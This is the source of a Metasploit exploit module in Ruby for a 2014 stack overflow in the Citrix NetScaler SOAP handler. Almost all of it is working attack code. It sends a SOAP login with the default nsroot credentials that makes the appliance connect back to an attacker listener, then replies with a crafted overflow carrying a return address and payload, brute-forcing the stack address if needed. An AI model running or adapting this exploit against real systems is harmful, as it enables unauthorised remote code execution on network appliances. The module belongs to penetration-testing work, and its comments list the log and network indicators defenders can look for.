GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for the Citrix NetScaler SOAP handler (see 'Description').
#
# Two mixins carry the traffic: HttpClient sends the SOAP request to the
# appliance, and TcpServer listens on SRVHOST:SRVPORT for the connection the
# handler is made to open back to this host (served by on_client_data).
# Brute supplies the return-address sweep used when the target's single
# preferred 'Ret' does not yield a session.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::Brute

  # Registers module metadata, the target table and the module options.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Citrix NetScaler SOAP Handler Remote Code Execution',
        # NOTE(review): the lines inside %q{ } are part of the string literal, so
        # they are kept at the column the original uses rather than re-indented.
        'Description' => %q{
This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.
The vulnerability exists in the SOAP handler, accessible through the web interface. A
malicious SOAP requests can force the handler to connect to a malicious NetScaler config
server. This malicious config server can send a specially crafted response in order to
trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary
code with the privileges of the web server running the SOAP handler. This module has been
tested successfully on the NetScaler Virtual Appliance 450010.
},
        'License' => MSF_LICENSE,
        'Author' => [
          'Bradley Austin', # Vulnerability Discovery and PoC
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          ['URL', 'http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']
        ],
        'Payload' => {
          'Space' => 1024,
          'MinNops' => 512,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
        'Arch' => ARCH_X86,
        'Platform' => 'bsd',
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'Targets' => [
          [
            'NetScaler Virtual Appliance 450010',
            {
              'RwPtr' => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.
              'Offset' => 606,
              'Ret' => 0xffffda94, # Try before bruteforce...
              # The virtual appliance lacks of security mitigations like DEP/ASLR, since the
              # process being exploited is an apache child, the bruteforce attack works fine
              # here.
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack
                'Stop' => { 'Ret' => 0xfffdf000 }, # top of the stack
                'Step' => 256
              }
            }
          ],
        ],
        'DisclosureDate' => '2014-09-22',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE, ],
          'Reliability' => [ REPEATABLE_SESSION, ],
          'SideEffects' => [ IOC_IN_LOGS, ]
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the soap handler', '/soap']),
        OptAddress.new('SRVHOST', [true, 'The local host to listen on. This must be an address on the local machine reachable by the target', ]),
        OptPort.new('SRVPORT', [true, 'The local port to listen on.', 3010])
      ]
    )
  end

  # Fingerprints the SOAP handler with a plain GET to TARGETURI.
  #
  # Only the handler's presence is established (a 200 whose body matches
  # "Server Request Handler ... No body received"); nothing here confirms the
  # memory corruption itself, which is why the result is Detected, not
  # Vulnerable.
  #
  # @return [Exploit::CheckCode] Detected or Unknown
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    })

    if res && res.code == 200 && res.body && res.body =~ /Server Request Handler.*No body received/m
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Unknown
  end

  # Entry point: validates SRVHOST, confirms the handler is reachable, starts the
  # listener, tries the target's preferred 'Ret' once and otherwise hands over to
  # the Brute mixin (super).
  def exploit
    # The appliance has to connect back to SRVHOST, so a wildcard or loopback
    # address can never work; reject it up front instead of waiting in vain.
    if ['0.0.0.0', '127.0.0.1'].include?(datastore['SRVHOST'])
      fail_with(Failure::BadConfig, 'Bad SRVHOST, use an address on the local machine reachable by the target')
    end

    if check != Exploit::CheckCode::Detected
      fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")
    end

    # Listener on SRVHOST:SRVPORT; the handler's connection is served by on_client_data.
    start_service

    # One attempt with the target's 'Ret' before sweeping the 'Bruteforce' range.
    if target.ret
      @curr_ret = target.ret
      send_request_soap
      Rex.sleep(3)

      if session_created?
        return
      end
    end

    # Brute mixin: presumably walks the target's 'Bruteforce' table and calls
    # brute_exploit once per candidate 'Ret' — that loop lives in the mixin, not here.
    super
  end

  # Brute mixin callback: a single attempt with the supplied return address.
  #
  # @param addrs [Hash] candidate addresses for this step; only 'Ret' is used
  def brute_exploit(addrs)
    @curr_ret = addrs['Ret']
    send_request_soap
  end

  # POSTs the SOAP "login" that points the handler at this module's listener.
  #
  # Both <clientip> and <ns> (the config server) are set to SRVHOST, which is what
  # makes the appliance connect back. The body carries the literal credentials
  # nsroot/nsroot; that request in the web log, plus an outbound connection from
  # the appliance to an unexpected host (SRVPORT, 3010 by default), is what a
  # defender can look for (cf. IOC_IN_LOGS in 'Notes').
  def send_request_soap
    soap = <<~EOS
      <?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
      <SOAP-ENV:Body>
      <ns7744:login xmlns:ns7744="urn:NSConfig">
      <username xsi:type="xsd:string">nsroot</username>
      <password xsi:type="xsd:string">nsroot</password>
      <clientip xsi:type="xsd:string">#{datastore['SRVHOST']}</clientip>
      <cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>
      <ns xsi:type="xsd:string">#{datastore['SRVHOST']}</ns>
      </ns7744:login>
      </SOAP-ENV:Body>
      </SOAP-ENV:Envelope>
    EOS

    print_status('Sending soap request...')

    # The second argument (1) is presumably the response timeout in seconds: the
    # handler is not expected to answer before it connects back to the listener.
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'data' => soap
    }, 1)
  end

  # TcpServer callback: answers the handler's connection with the crafted reply.
  #
  # Inbound framing as read here: a 2-byte little-endian length that counts
  # itself, then the rest of the request, whose first 4 bytes are expected to be
  # 0xa5a50000 (little-endian). The reply mirrors that framing: length prefix,
  # the marker bytes "\x00\x00\xa5\xa5", then the body.
  #
  # @param cli [Object] accepted connection (responds to peerhost, get_once,
  #   put and disconnect)
  def on_client_data(cli)
    print_status("#{cli.peerhost} - Getting request...")

    # NOTE(review): get_once can return nil if the peer closes before sending the
    # 2-byte prefix, in which case unpack raises inside the server callback; a
    # length below 2 would also make the second read size non-positive — confirm
    # how the framework handles both before relying on this path.
    data = cli.get_once(2)
    req_length = data.unpack('v')[0]

    req_data = cli.get_once(req_length - 2)
    # A marker mismatch is only reported; the reply is sent regardless.
    unless req_data.unpack('V')[0] == 0xa5a50000
      print_error("#{cli.peerhost} - Incorrect request... sending payload anyway")
    end

    print_status("#{cli.peerhost} - Sending #{payload.encoded.length} bytes payload with ret 0x#{@curr_ret.to_s(16)}...")

    # Body: 'Offset' bytes of filler, then the current return address and 'RwPtr'
    # as two little-endian 32-bit values, then the encoded payload.
    my_payload = Rex::Text.pattern_create(target['Offset'])
    my_payload << [@curr_ret, target['RwPtr']].pack('V*')
    my_payload << payload.encoded

    # The length prefix covers itself (2 bytes) and the 4-byte marker.
    pkt = [my_payload.length + 6].pack('v')
    pkt << "\x00\x00\xa5\xa5"
    pkt << my_payload
    cli.put(pkt)
    cli.disconnect
  end
end